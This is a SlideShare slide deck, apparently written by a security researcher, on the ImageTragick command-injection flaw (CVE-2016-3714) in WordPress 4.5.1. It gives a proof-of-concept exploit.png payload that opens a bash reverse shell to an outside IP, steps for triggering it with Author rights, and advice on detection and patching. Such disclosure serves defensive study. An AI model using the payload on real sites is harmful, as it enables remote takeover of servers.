SlideShare uma empresa Scribd logo

Remote code execute wordpress

S
Sina Yeganeh

Image Magick Vulnerability , CVE-2016-3714

Apresentações e oratória
1 de 17
Baixar para ler offline
Remote Code Execute Wordpress 4.5.1 AUTHER: SINA YEGANEH EMAIL:SINAAA.YEAGNEH@GMAIL.COM
ImageMagick  Imagick is a native php extension to create and modify images using the ImageMagick API.  ImageMagick is a software suite to create, edit, and compose bitmap images. It can read, convert and write images in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF, PhotoCD, PNG, Postscript, SVG, and TIFF.
Image Magick Vulnerability Information  A few days ago an Image Magick vulnerability was disclosed CVE- 2016-3714  This vulnerability resolve pictures from Magiccore/constitute.c of ReadImage Function , if the image address is https:// at the beginning ,that call InvokeDelegate
Exploit ImageMagick  One of the default delegate commands uses the following to handle HTTPS requests:  "wget" -q -O "%o" "https:%M”  where %M is the actual link from the input. It is possible to pass the value like:  example.com"|ls "-la
How is WordPress affected?  WordPress select a Library for Editing Images. WordPress image processing use Imagick Library by default.
How is WordPress affected? If WordPress Select Imagick Library Then Load it.
How is WordPress affected? get_attached_file function in wp_crop_image function invoke system function mentioned in library
Poc  Upload an normal image format  With Author permissions login to account, publish an article, insert the Media.
Poc Create exploit.png file : push graphic-context viewbox 0 0 640 480 fill 'url (https://example.com/image.jpg "|bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”)' pop graphic-context Upload Exploit.png and add to Post
poc  click on our normal picture , select Edit , then edit Orginal
poc Rotate/Crop image then ‘Copy as cURL’ the invoked link.
poc Then click the broken image Edit and Edit Original, check requests listed on network and find admin-ajax.php see requests with ‘post’ type, copy _ajax_nonce And postid parameter.
poc Paste New Parameters from Broken Image to Curl Command mentioned before Proof of Concept By Getting Connect Back (Change bash command As you wish)
How do I know if my site is vulnerable?  Inspect the output of the phpinfo() function for “Imagick”.  Run php -m | grep imagick on the command line.
How do I patch the vulnerability? Currently the best known fix is to add a policy.xml file to your ImageMagick installation to limit the delegates that ImageMagick will use. Due to the ongoing nature of this issue, we recommend you refer to and follow https://imagetragick.com/ for instructions on how to handle the problem. Documentation on the policy.xml file can be found at https://www.imagemagick.org/script/resources.php.
Refrance:  http://www.imagemagick.org/  https://make.wordpress.org/core/2016/05/06/imagemagick- vulnerability-information/  https://access.redhat.com/security/vulnerabilities/2296071  http://www.secpulse.com/archives/45802.html
End

Recomendados

Organic Farming Ling 11 23
Organic Farming Ling 11 23Organic Farming Ling 11 23
Organic Farming Ling 11 23colleen0814
 
Look food
Look foodLook food
Look foodЛюдмила
 
Tarea 32. linio y wish
Tarea 32. linio y wishTarea 32. linio y wish
Tarea 32. linio y wishequipo3-12V
 
Healthy, Happy and Helping
Healthy, Happy and Helping Healthy, Happy and Helping
Healthy, Happy and Helping International Student Insurance
 
Open Data di Comunità
Open Data di ComunitàOpen Data di Comunità
Open Data di ComunitàCristiano Longo
 
03 data structure
03 data structure03 data structure
03 data structureKittiphat Chitsawang
 
Icm team140
Icm team140Icm team140
Icm team140TEAM140
 
Alex launch presentation intl dist 0317
Alex launch presentation intl dist 0317Alex launch presentation intl dist 0317
Alex launch presentation intl dist 0317Ozgur Inal
 

Recomendados

Organic Farming Ling 11 23
Organic Farming Ling 11 23Organic Farming Ling 11 23
Organic Farming Ling 11 23colleen0814
 
Look food
Look foodLook food
Look foodЛюдмила
 
Tarea 32. linio y wish
Tarea 32. linio y wishTarea 32. linio y wish
Tarea 32. linio y wishequipo3-12V
 
Healthy, Happy and Helping
Healthy, Happy and Helping Healthy, Happy and Helping
Healthy, Happy and Helping International Student Insurance
 
Open Data di Comunità
Open Data di ComunitàOpen Data di Comunità
Open Data di ComunitàCristiano Longo
 
03 data structure
03 data structure03 data structure
03 data structureKittiphat Chitsawang
 
Icm team140
Icm team140Icm team140
Icm team140TEAM140
 
Alex launch presentation intl dist 0317
Alex launch presentation intl dist 0317Alex launch presentation intl dist 0317
Alex launch presentation intl dist 0317Ozgur Inal
 
Profilo eviva tour vietnam
Profilo eviva tour vietnamProfilo eviva tour vietnam
Profilo eviva tour vietnamKrista Giang
 
Davis ux portfolio
Davis ux portfolioDavis ux portfolio
Davis ux portfolioJef Davis
 
e-Works Profilee October 2010
e-Works Profilee October 2010e-Works Profilee October 2010
e-Works Profilee October 2010e-Works Web Design Studio
 
2.0 investigacion
2.0 investigacion2.0 investigacion
2.0 investigaciontatisrodriguez1103
 
JetStream Comfort
JetStream ComfortJetStream Comfort
JetStream ComfortMr. Koala T. Green
 
Magic Web Consultants: Company profile
Magic Web Consultants: Company profileMagic Web Consultants: Company profile
Magic Web Consultants: Company profileGaurav Kakade
 
D 102
D 102 D 102
D 102 danieladod
 
2014 BRANDS TO WATCH
2014 BRANDS TO WATCH2014 BRANDS TO WATCH
2014 BRANDS TO WATCHMary Olson
 
Girlgames and girl MMOs
Girlgames and girl MMOsGirlgames and girl MMOs
Girlgames and girl MMOsSonja Ängeslevä
 
Vodafone CU "RESTART" project
Vodafone CU "RESTART" project Vodafone CU "RESTART" project
Vodafone CU "RESTART" project Konstantina Papadimitriou
 
Viral euromag
Viral euromagViral euromag
Viral euromagEvgeniy Bitenskiy
 
88 look food88
88 look food8888 look food88
88 look food88Людмила
 
System2010 12
System2010 12System2010 12
System2010 12Akao Koichi
 
Báo giá Quảng Cáo Webtretho.com
Báo giá Quảng Cáo Webtretho.comBáo giá Quảng Cáo Webtretho.com
Báo giá Quảng Cáo Webtretho.comQmedia AdNetwork
 
Lapor! untuk Mahasiswa
Lapor! untuk MahasiswaLapor! untuk Mahasiswa
Lapor! untuk MahasiswaKhaira Al Hafi
 
Log0 class01
Log0 class01Log0 class01
Log0 class01Jorge Juárez
 
SAPICAの利用履歴を可視化する
SAPICAの利用履歴を可視化するSAPICAの利用履歴を可視化する
SAPICAの利用履歴を可視化するYoji Shidara
 
Hs
HsHs
HsRahul Gupta
 
Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoKayode Fayemi
 
If this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaIf this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaKayode Fayemi
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar TrainingKylaCullinane
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfSkillCertProExams
 

Mais conteúdo relacionado

Destaque

Profilo eviva tour vietnam
Profilo eviva tour vietnamProfilo eviva tour vietnam
Profilo eviva tour vietnamKrista Giang
 
Davis ux portfolio
Davis ux portfolioDavis ux portfolio
Davis ux portfolioJef Davis
 
Magic Web Consultants: Company profile
Magic Web Consultants: Company profileMagic Web Consultants: Company profile
Magic Web Consultants: Company profileGaurav Kakade
 
2014 BRANDS TO WATCH
2014 BRANDS TO WATCH2014 BRANDS TO WATCH
2014 BRANDS TO WATCHMary Olson
 
Báo giá Quảng Cáo Webtretho.com
Báo giá Quảng Cáo Webtretho.comBáo giá Quảng Cáo Webtretho.com
Báo giá Quảng Cáo Webtretho.comQmedia AdNetwork
 
Lapor! untuk Mahasiswa
Lapor! untuk MahasiswaLapor! untuk Mahasiswa
Lapor! untuk MahasiswaKhaira Al Hafi
 
SAPICAの利用履歴を可視化する
SAPICAの利用履歴を可視化するSAPICAの利用履歴を可視化する
SAPICAの利用履歴を可視化するYoji Shidara
 

Destaque (18)

Profilo eviva tour vietnam
Profilo eviva tour vietnamProfilo eviva tour vietnam
Profilo eviva tour vietnam
 
Davis ux portfolio
Davis ux portfolioDavis ux portfolio
Davis ux portfolio
 
e-Works Profilee October 2010
e-Works Profilee October 2010e-Works Profilee October 2010
e-Works Profilee October 2010
 
2.0 investigacion
2.0 investigacion2.0 investigacion
2.0 investigacion
 
JetStream Comfort
JetStream ComfortJetStream Comfort
JetStream Comfort
 
Magic Web Consultants: Company profile
Magic Web Consultants: Company profileMagic Web Consultants: Company profile
Magic Web Consultants: Company profile
 
D 102
D 102 D 102
D 102
 
2014 BRANDS TO WATCH
2014 BRANDS TO WATCH2014 BRANDS TO WATCH
2014 BRANDS TO WATCH
 
Girlgames and girl MMOs
Girlgames and girl MMOsGirlgames and girl MMOs
Girlgames and girl MMOs
 
Vodafone CU "RESTART" project
Vodafone CU "RESTART" project Vodafone CU "RESTART" project
Vodafone CU "RESTART" project
 
Viral euromag
Viral euromagViral euromag
Viral euromag
 
88 look food88
88 look food8888 look food88
88 look food88
 
System2010 12
System2010 12System2010 12
System2010 12
 
Báo giá Quảng Cáo Webtretho.com
Báo giá Quảng Cáo Webtretho.comBáo giá Quảng Cáo Webtretho.com
Báo giá Quảng Cáo Webtretho.com
 
Lapor! untuk Mahasiswa
Lapor! untuk MahasiswaLapor! untuk Mahasiswa
Lapor! untuk Mahasiswa
 
Log0 class01
Log0 class01Log0 class01
Log0 class01
 
SAPICAの利用履歴を可視化する
SAPICAの利用履歴を可視化するSAPICAの利用履歴を可視化する
SAPICAの利用履歴を可視化する
 
Hs
HsHs
Hs
 

Último

Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoKayode Fayemi
 
If this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaIf this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaKayode Fayemi
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar TrainingKylaCullinane
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfSkillCertProExams
 
Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Vipesco
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Delhi Call girls
 
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...amilabibi1
 
My Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle BaileyMy Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle Baileyhlharris
 
Causes of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCauses of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCamilleBoulbin1
 
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verifiedSector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verifiedDelhi Call girls
 
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxraffaeleoman
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIINhPhngng3
 
Digital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of DrupalDigital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of DrupalFabian de Rijk
 
Dreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video TreatmentDreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video Treatmentnswingard
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lodhisaajjda
 
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfThe workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfSenaatti-kiinteistöt
 
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...Pooja Nehwal
 

Último (18)

Uncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac FolorunsoUncommon Grace The Autobiography of Isaac Folorunso
Uncommon Grace The Autobiography of Isaac Folorunso
 
If this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New NigeriaIf this Giant Must Walk: A Manifesto for a New Nigeria
If this Giant Must Walk: A Manifesto for a New Nigeria
 
Report Writing Webinar Training
Report Writing Webinar TrainingReport Writing Webinar Training
Report Writing Webinar Training
 
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdfAWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
AWS Data Engineer Associate (DEA-C01) Exam Dumps 2024.pdf
 
Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510Thirunelveli call girls Tamil escorts 7877702510
Thirunelveli call girls Tamil escorts 7877702510
 
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
Busty Desi⚡Call Girls in Sector 51 Noida Escorts >༒8448380779 Escort Service-...
 
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
Bring back lost lover in USA, Canada ,Uk ,Australia ,London Lost Love Spell C...
 
My Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle BaileyMy Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle Bailey
 
Causes of poverty in France presentation.pptx
Causes of poverty in France presentation.pptxCauses of poverty in France presentation.pptx
Causes of poverty in France presentation.pptx
 
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verifiedSector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
Sector 62, Noida Call girls :8448380779 Noida Escorts | 100% verified
 
ICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdfICT role in 21st century education and it's challenges.pdf
ICT role in 21st century education and it's challenges.pdf
 
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptxChiulli_Aurora_Oman_Raffaele_Beowulf.pptx
Chiulli_Aurora_Oman_Raffaele_Beowulf.pptx
 
Dreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio IIIDreaming Music Video Treatment _ Project & Portfolio III
Dreaming Music Video Treatment _ Project & Portfolio III
 
Digital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of DrupalDigital collaboration with Microsoft 365 as extension of Drupal
Digital collaboration with Microsoft 365 as extension of Drupal
 
Dreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video TreatmentDreaming Marissa Sánchez Music Video Treatment
Dreaming Marissa Sánchez Music Video Treatment
 
lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.lONG QUESTION ANSWER PAKISTAN STUDIES10.
lONG QUESTION ANSWER PAKISTAN STUDIES10.
 
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdfThe workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
The workplace ecosystem of the future 24.4.2024 Fabritius_share ii.pdf
 
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
Aesthetic Colaba Mumbai Cst Call girls 📞 7738631006 Grant road Call Girls ❤️-...
 

Remote code execute wordpress

  • 1. Remote Code Execute Wordpress 4.5.1 AUTHER: SINA YEGANEH EMAIL:SINAAA.YEAGNEH@GMAIL.COM
  • 2. ImageMagick  Imagick is a native php extension to create and modify images using the ImageMagick API.  ImageMagick is a software suite to create, edit, and compose bitmap images. It can read, convert and write images in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF, PhotoCD, PNG, Postscript, SVG, and TIFF.
  • 3. Image Magick Vulnerability Information  A few days ago an Image Magick vulnerability was disclosed CVE- 2016-3714  This vulnerability resolve pictures from Magiccore/constitute.c of ReadImage Function , if the image address is https:// at the beginning ,that call InvokeDelegate
  • 4. Exploit ImageMagick  One of the default delegate commands uses the following to handle HTTPS requests:  "wget" -q -O "%o" "https:%M”  where %M is the actual link from the input. It is possible to pass the value like:  example.com"|ls "-la
  • 5. How is WordPress affected?  WordPress select a Library for Editing Images. WordPress image processing use Imagick Library by default.
  • 6. How is WordPress affected? If WordPress Select Imagick Library Then Load it.
  • 7. How is WordPress affected? get_attached_file function in wp_crop_image function invoke system function mentioned in library
  • 8. Poc  Upload an normal image format  With Author permissions login to account, publish an article, insert the Media.
  • 9. Poc Create exploit.png file : push graphic-context viewbox 0 0 640 480 fill 'url (https://example.com/image.jpg "|bash -i >& /dev/tcp/10.0.0.1/8080 0>&1”)' pop graphic-context Upload Exploit.png and add to Post
  • 10. poc  click on our normal picture , select Edit , then edit Orginal
  • 11. poc Rotate/Crop image then ‘Copy as cURL’ the invoked link.
  • 12. poc Then click the broken image Edit and Edit Original, check requests listed on network and find admin-ajax.php see requests with ‘post’ type, copy _ajax_nonce And postid parameter.
  • 13. poc Paste New Parameters from Broken Image to Curl Command mentioned before Proof of Concept By Getting Connect Back (Change bash command As you wish)
  • 14. How do I know if my site is vulnerable?  Inspect the output of the phpinfo() function for “Imagick”.  Run php -m | grep imagick on the command line.
  • 15. How do I patch the vulnerability? Currently the best known fix is to add a policy.xml file to your ImageMagick installation to limit the delegates that ImageMagick will use. Due to the ongoing nature of this issue, we recommend you refer to and follow https://imagetragick.com/ for instructions on how to handle the problem. Documentation on the policy.xml file can be found at https://www.imagemagick.org/script/resources.php.
  • 16. Refrance:  http://www.imagemagick.org/  https://make.wordpress.org/core/2016/05/06/imagemagick- vulnerability-information/  https://access.redhat.com/security/vulnerabilities/2296071  http://www.secpulse.com/archives/45802.html
  • 17. End